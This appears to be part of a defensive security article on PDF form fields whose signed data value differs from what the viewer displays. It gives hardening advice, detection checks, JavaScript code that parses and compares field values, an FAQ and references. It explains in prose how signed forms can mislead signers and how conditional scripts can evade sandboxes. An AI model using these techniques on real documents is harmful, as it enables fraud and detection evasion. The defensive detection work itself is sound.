For Individuals: Viewer Settings

Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it; JS is mainly required for field validation, calculated fields, and multi-step wizards.
Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). If you receive external forms, keep the Privileged Locations list in that panel free of folders where those forms are saved.
Open in a browser for untrusted files: Chrome (PDFium) and Firefox (pdf.js) support only a limited subset of the Acrobat JavaScript API, mainly for form calculation and validation, and run it inside the browser's sandbox. This does not prevent V/AP divergence from affecting the display, but it greatly reduces the JavaScript execution surface.
Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by exporting the form data as FDF/XFDF and comparing it to what you see.

For Developers and Pipelines

Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the AcroForm dictionary — not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs.
Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values; its generator covers text and choice fields, not checkboxes or radio buttons.
Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match.
Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads /V and posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.
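The rejection rule above can be sketched as a coarse gate in front of a pipeline. Treat it as illustrative: it scans the raw file as a latin1 string, so dictionaries inside compressed object streams are invisible to it, and the `ingestDecision` name and its return values are assumptions. It treats a /ByteRange array as evidence of a signature because a signature dictionary normally carries /ByteRange, whereas its /Type entry is optional.

```javascript
// Coarse pre-ingestion gate: reject (or route to manual review) any file that is both
// signed and flagged /NeedAppearances true. Works on the raw file text only.
function ingestDecision(pdfText) {
  const needAppearances = /\/NeedAppearances\s+true\b/.test(pdfText);
  const signed = /\/ByteRange\s*\[/.test(pdfText); // signature dictionaries carry /ByteRange
  if (needAppearances && signed) return 'reject';  // displayed and certified provenance differ
  // /NeedAppearances true on its own is a medium finding: accept, but worth logging.
  return 'accept';
}

// Usage: read the file as latin1 so byte values map 1:1 to characters.
// const text = require('fs').readFileSync('incoming.pdf', 'latin1');
// console.log(ingestDecision(text));
```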

For Enterprise and IT

Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.

Detection Methodology Reference

The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.

Structural check	What it finds	Severity conditions
`/NeedAppearances true`	AP streams are stale by construction — viewer regenerates from `/V` at open time	Medium alone; Critical when a digital signature is also present
Checkbox/radio `/V` vs `/AS` key comparison	Stored data value and displayed appearance state structurally disagree	High; Critical when inside a signed byte range
AP stream text extraction (text fields)	`Tj`/`TJ` operators reconstructed and compared to `/V`; literal and hex-string encoding handled	High; Critical when signed
AP stream text extraction (listbox/combobox)	Multi-select array extraction; `/Opt` export→display map resolved before comparison to prevent false positives on choice fields	High; Critical when signed
Blank AP stream	AP stream present but contains no text drawing operators — value in file, field renders blank	Medium
Missing AP (`/V` set, no `/AP`)	Display is viewer-defined via `/DA` — not statically present in the file	Medium
Field-value seeding in JS behavioral analysis	`doc.getField()` stub receives real `/V` values; conditional exploitation chains that gate on field content are correctly followed	Applies to any JS indicator elevated by field-value conditioning
DocMDP P=1 + DSS-only incremental update	Incremental section contains `/DSS`/`/VRI` and no execution vectors, annotations, or form elements — permitted under ISO 32000-2 §12.8.2.2	Low (informational); Full bypass severity if DSS is mixed with execution vectors
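The text-field and choice-field rows of the table can be sketched as a single comparison routine. This is a simplified illustration, not the scanner's code: it assumes the /AP /N stream is already decompressed to a latin1 string, fonts use a simple single-byte encoding (no /Differences remap or CID fonts), /V arrives as a raw PDF string token, and /Opt has already been parsed into JavaScript values. Multi-select arrays, TJ kerning that stands in for spaces, and PDFDocEncoding (treated here as latin1) are not handled. All function names are hypothetical.

```javascript
// Unescape the body of a PDF literal string (text between the outer parentheses).
function unescapeLiteral(s) {
  const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', '(': '(', ')': ')', '\\': '\\' };
  let out = '';
  for (let i = 0; i < s.length; i++) {
    if (s[i] !== '\\') { out += s[i]; continue; }
    const next = s[++i];
    if (next === undefined) break;
    if (next in simple) out += simple[next];
    else if (/[0-7]/.test(next)) {                     // up to three octal digits
      let oct = next;
      while (oct.length < 3 && /[0-7]/.test(s[i + 1] || '')) oct += s[++i];
      out += String.fromCharCode(parseInt(oct, 8) & 0xff);
    } else if (next === '\r' || next === '\n') { if (next === '\r' && s[i + 1] === '\n') i++; } // line continuation
    else out += next;                                  // unknown escape: backslash is dropped
  }
  return out;
}

function decodeHex(hex) {                              // whitespace ignored, odd digit padded with 0
  let digits = hex.replace(/\s+/g, '');
  if (digits.length % 2) digits += '0';
  let out = '';
  for (let i = 0; i < digits.length; i += 2) out += String.fromCharCode(parseInt(digits.slice(i, i + 2), 16));
  return out;
}

// Text strings starting with FE FF are UTF-16BE; anything else is treated as latin1 here.
function decodeTextString(b) {
  if (b.charCodeAt(0) !== 0xfe || b.charCodeAt(1) !== 0xff) return b;
  let out = '';
  for (let i = 2; i + 1 < b.length; i += 2) out += String.fromCharCode((b.charCodeAt(i) << 8) | b.charCodeAt(i + 1));
  return out;
}

function pdfStringValue(token) {                       // raw /V token: "(...)" or "<...>"
  const t = token.trim();
  if (t.startsWith('<')) return decodeTextString(decodeHex(t.slice(1, -1)));
  if (t.startsWith('(')) return decodeTextString(unescapeLiteral(t.slice(1, -1)));
  return t;
}

// Join the string operands of each text-showing operator (Tj, TJ, ', ") in the stream.
function shownText(content) {
  const pieces = [];
  let pending = [];                                    // string operands since the last operator
  let i = 0;
  while (i < content.length) {
    const c = content[i];
    if (c === '(') {                                   // literal string, parentheses may nest
      let depth = 1, j = i + 1;
      while (j < content.length && depth > 0) {
        if (content[j] === '\\') j++;
        else if (content[j] === '(') depth++;
        else if (content[j] === ')') depth--;
        j++;
      }
      pending.push(unescapeLiteral(content.slice(i + 1, depth === 0 ? j - 1 : j)));
      i = j;
    } else if (c === '<' && content[i + 1] === '<') {  // dictionary operand, not a string
      i += 2;
    } else if (c === '<') {                            // hex string
      const end = content.indexOf('>', i);
      const stop = end === -1 ? content.length : end;
      pending.push(decodeHex(content.slice(i + 1, stop)));
      i = stop + 1;
    } else if (c === '%') {                            // comment runs to end of line
      while (i < content.length && content[i] !== '\n' && content[i] !== '\r') i++;
    } else if (c === '/') {                            // name operand
      i++;
      while (i < content.length && !/[\s()<>\[\]{}\/%]/.test(content[i])) i++;
    } else if (/[A-Za-z'"]/.test(c)) {                 // operator keyword
      let j = i;
      while (j < content.length && /[A-Za-z0-9'"*]/.test(content[j])) j++;
      const op = content.slice(i, j);
      if (op === 'Tj' || op === 'TJ' || op === "'" || op === '"') pieces.push(pending.join(''));
      pending = [];
      i = j;
    } else i++;                                        // numbers, array brackets, whitespace
  }
  return pieces.join(' ');
}

const normalise = (s) => s.replace(/\s+/g, ' ').trim();
// /Opt entries are display strings or [export, display] pairs; map export -> display.
function displayFor(value, opt) {
  for (const entry of opt || []) if (Array.isArray(entry) && entry[0] === value) return entry[1];
  return value;
}

function vapMismatch(apContent, vToken, opt) {
  const expected = normalise(displayFor(pdfStringValue(vToken), opt));
  const rendered = normalise(shownText(apContent));
  return { expected, rendered, mismatch: rendered !== '' && rendered !== expected }; // blank AP is a separate check
}

console.log(vapMismatch('BT /Helv 10 Tf 2 4 Td (Approved) Tj ET', '<52656a6563746564>')); // /V is "Rejected": mismatch
```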

PDF has accumulated three decades of features with no removal path, and the complexity around those features is the context for everything above. The checks above are designed to avoid false positives on legitimately authored documents; the /Opt export-value resolution and hex-string /V handling were added specifically to handle valid authoring patterns that naive string comparison would misread. Edge cases are possible; the structural indicators raise questions, not verdicts.


Frequently Asked Questions

What is V/AP divergence in PDF AcroForm fields?

In a PDF AcroForm, every field stores its value in two independent locations: /V (the machine-readable data value read by JavaScript, form submission engines, and digital signature byte-range hashing) and /AP /N (the appearance stream the PDF viewer renders as pixels on screen). These stores are not derived from each other. V/AP divergence occurs when they disagree — the viewer displays one thing while the machine-readable value contains another. A digital signature can certify both while they structurally disagree.

Can a digitally signed PDF show different values to a human and to automated processing?

Yes. A digital signature certifies a byte range covering both /V and /AP. If an author sets /V to one amount and authors an /AP stream rendering a different figure, both are inside the certified byte range. The human signer sees what /AP renders; any JavaScript, form submission, or downstream automated system reads /V. The signature remains valid because the byte range is intact — it certifies content that structurally disagrees within itself.

What does `/NeedAppearances true` mean for a digitally signed PDF?

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer regenerates appearance streams from /V field values at document open time — the /AP streams stored on disk are stale by construction. Combined with a digital signature, the byte-range hash covers the stale /AP, but the viewer regenerates the appearance from /V after opening. The provenance of what is displayed and what was certified is always structurally different.

How can V/AP divergence be detected without rendering the PDF?

Five static checks operate directly on the raw PDF object model: (1) /NeedAppearances detection via regex against the AcroForm dictionary; (2) Checkbox and radio /V vs /AS key comparison — a pure string comparison of two name objects; (3) AP stream text extraction — decompress the /AP /N content stream, parse Tj/TJ operators, PDF-unescape and whitespace-normalise, compare to /V with hex-string decoding and /Opt export-value resolution; (4) Blank AP stream detection; (5) Missing AP detection. None require opening the file in a viewer.
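Check (2) is the simplest of the five. A minimal sketch, assuming the button field has already been parsed into plain objects (names without the leading slash, `onState` being the widget's non-Off /AP /N key) and that a missing /V or /AS means Off; the input shape and the `vAsMismatches` name are hypothetical. Radio groups are handled by requiring each widget to be on exactly when /V names its on-state.

```javascript
// field = { V, kids: [{ AS, onState }, ...] }; a merged single-widget checkbox has one kid.
function vAsMismatches(field) {
  const v = field.V === undefined ? 'Off' : field.V;
  const problems = [];
  for (const [index, kid] of field.kids.entries()) {
    const as = kid.AS === undefined ? 'Off' : kid.AS;
    const shouldBeOn = v !== 'Off' && kid.onState === v; // /V selects this widget's on-state
    const isOn = as !== 'Off';
    if (shouldBeOn !== isOn || (isOn && as !== kid.onState)) problems.push({ index, V: v, AS: as });
  }
  return problems;
}

// A checkbox whose stored value is Yes but whose appearance state is Off.
console.log(vAsMismatches({ V: 'Yes', kids: [{ AS: 'Off', onState: 'Yes' }] }).length); // 1
```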

What is DocMDP P=1 and why does the DSS/LTV exemption matter?

DocMDP P=1 is a certifying signature permission level that prohibits all modifications to a PDF after signing. ISO 32000-2 §12.8.2.2 NOTE 2 explicitly exempts DSS (Document Security Store) and LTV (Long Term Validation) additions — these carry OCSP responses, CRLs, and certificate chains needed to validate the signature long after the signing certificate’s OCSP responder may be offline. A scanner that flags all incremental updates under P=1 as bypass attempts will produce false positives on every legitimately LTV-enabled document.

What is the difference between a PDF form field’s `/V` value and its `/AP /N` appearance stream?

/V is the field’s machine-readable value — read by JavaScript (doc.getField().value), included in form submissions, and covered by the digital signature byte-range hash. /AP /N is a self-contained PDF content stream the viewer renders as pixels — it is what the user sees on screen. The two are authored independently, are not derived from each other, and only the viewer reads /AP. Everything else — JavaScript, submission engines, signature validators — reads /V.

How does JavaScript field-value conditioning work as a PDF attack technique?

A malicious PDF can contain OpenAction JavaScript that reads a form field value and conditionally launches a URL or posts data only when that value matches a specific string such as ‘approved’. If a behavioral sandbox returns empty strings for all getField() calls — the natural default when field enumeration and JS emulation run as independent passes — the conditional is never satisfied and the sandbox reports clean. Correct detection requires seeding the JS emulator with real /V values extracted from the AcroForm field dictionaries before execution.

Which PDF authoring tools produce legitimate `/NeedAppearances true` documents?

Programmatic form-fill workflows that update /V but defer /AP regeneration legitimately produce /NeedAppearances true documents, including mail-merge pipelines, PDF form-fill libraries, and e-signature platforms (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; observed behavior, not vendor-documented) that prioritise speed over appearance-stream completeness. On its own, /NeedAppearances true is a medium-severity finding. The critical signal is /NeedAppearances true combined with a digital signature, which is rarely produced by legitimate tooling. Running qpdf --generate-appearances before signing eliminates the condition by rebuilding appearance streams from current /V values; qpdf's generator covers text and choice fields, not checkboxes or radio buttons.

Research References

C. Mainka, V. Mladenov, S. Rohlmann, J. Schwenk. “Shadow Attacks: Hiding and Replacing Content in Signed PDFs.” Proceedings of the Network and Distributed System Security Symposium (NDSS) 2021 and extended presentation at ACM CCS 2021. Disclosed to 28 vendors; resulted in patches from Adobe, Foxit, LibreOffice, and others.
ndss-symposium.org
J. Müller, V. Mladenov, J. Somorovsky, J. Schwenk. “PDF Insecurity” series (2017–2019). Systematic study of signature-validation weaknesses across viewers and libraries. Introduced the Universal Signature Forgery and incremental-save attack classifications.
pdf-insecurity.org
ISO 32000-2:2020. Document management — Portable Document Format — Part 2: PDF 2.0. International Organization for Standardization, Geneva, Switzerland. §12.8.2.2 (DocMDP), §12.7.3 (AcroForm), §12.7.4 (Field types and /V semantics), §12.7.8 (XFA forms — deprecated in PDF 2.0).
ETSI EN 319 132-1 V1.2.1 (2019). Electronic Signatures and Infrastructures (ESI); XAdES digital signatures; Part 1: Building blocks and XAdES baseline signatures. European Telecommunications Standards Institute. The PAdES counterpart, ETSI EN 319 142-1, defines the DSS/LTV additions that ISO 32000-2 §12.8.2.2 NOTE 2 permits under DocMDP P=1; ETSI EN 319 102-1 specifies the procedures for creating and validating AdES signatures.
ETSI EN 319 102-1 (PDF)
MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment. Documents the operational use of malicious file attachments, including PDF-delivered payloads, as an initial-access technique. Relevant to the threat-spectrum context in this article: the majority of malicious PDFs observed in the wild are spearphishing attachments that do not rely on AcroForm field manipulation.
attack.mitre.org/techniques/T1566/001
UK National Cyber Security Centre. “Pattern: Safe Import.” NCSC Guidance. Describes the content-disarm-and-reconstruct (CDR) approach to untrusted document import: strip active content, rebuild the file from validated structure. The multi-layer sanitization philosophy in this article (strip, flatten, rasterise as ordered trust levels) maps directly to this pattern.
ncsc.gov.uk/guidance/pattern-safe-import
D. Stevens. PDF malware analysis tools and research. Didier Stevens has published practical PDF malware analysis resources including pdfid.py and pdf-parser.py — widely used to enumerate PDF objects, detect JavaScript, identify OpenAction and embedded file streams, and triage suspicious PDFs without rendering.
blog.didierstevens.com/programs/pdf-tools
CVE-2021-28550. Adobe Acrobat and Reader use-after-free (APSB21-29, May 2021). Exploitable via malformed AcroForm structure; remote code execution. CVSS 8.8.
CVE-2021-21017. Adobe Acrobat heap-based buffer overflow in XFA engine (APSB21-09, February 2021). Remote code execution. CVSS 8.8.
CVE-2024-45112. Adobe Acrobat XFA/AcroForm type confusion (APSB24-70, September 2024). Remote code execution; exploitable via a PDF containing both XFA and AcroForm structures. CVSS 8.6.
CVE-2023-21608. Adobe Acrobat use-after-free (APSB23-01, January 2023). Remote code execution via crafted PDF. CVSS 7.8.